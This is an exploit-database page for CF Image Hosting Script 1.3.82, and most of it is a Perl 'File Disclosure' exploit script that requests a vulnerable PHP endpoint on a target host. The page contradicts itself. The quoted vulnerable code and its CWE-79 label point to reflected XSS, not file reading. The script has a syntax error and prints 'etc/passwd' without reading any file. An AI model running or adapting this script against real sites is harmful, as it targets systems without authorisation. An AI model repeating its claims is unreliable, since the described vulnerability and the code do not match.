CF Image Hosting Script 1.3.82 File Disclosure

2011-10-05 / 2012-08-07
Credit: bd0rk
Risk: High
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

#!/usr/bin/perl #CF Image Hosting Script 1.3.82 File Disclosure Exploit #Bugfounder and Exploitcoder: bd0rk #Contact: www.sohcrew.school-of-hack.net #eMail: bd0rk[at]hackermail.com #Affected-Software: CF Image Hosting Script 1.3.82 #Vendor: http://www.phpkode.com #Download: http://phpkode.com/download/p/CF_Image_Hosting_v1.3.zip #Vulnerable Code in /inc/tesmodrewrite.php line 28 #echo "Current URL: " . $_GET['q']; #Tested on Ubuntu-Linux use LWP::Simple; use LWP::UserAgent; sub help() { print "Sploit: perl $0 [targethost] /dir/\n"; } print "\nCF Image Hosting Script 1.3.82 File Disclosure Exploit\n"; print "\ By bd0rk bd0rk[at]hackermail.com\n"; ($inc, $targethost, $dir, $file,) = @ARGV; $inc="/inc/"; $file="tesmodrewrite.php?q=[APossibleFile]"; my $url = "http://".$targethost.$dir.$inc.$file; my $useragent = LWP::UserAgent->new(); my $req = $useragent->get($url,":content_file"=>"[APossibleFile]"); if ($req->is_success) { print "$url <= H3h3!\n\n"; print "etc/passwd\n"; exit(); } else { print "Sploit $url Mhhh!\n[!]".$req->status_line.\n"; exit(); }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top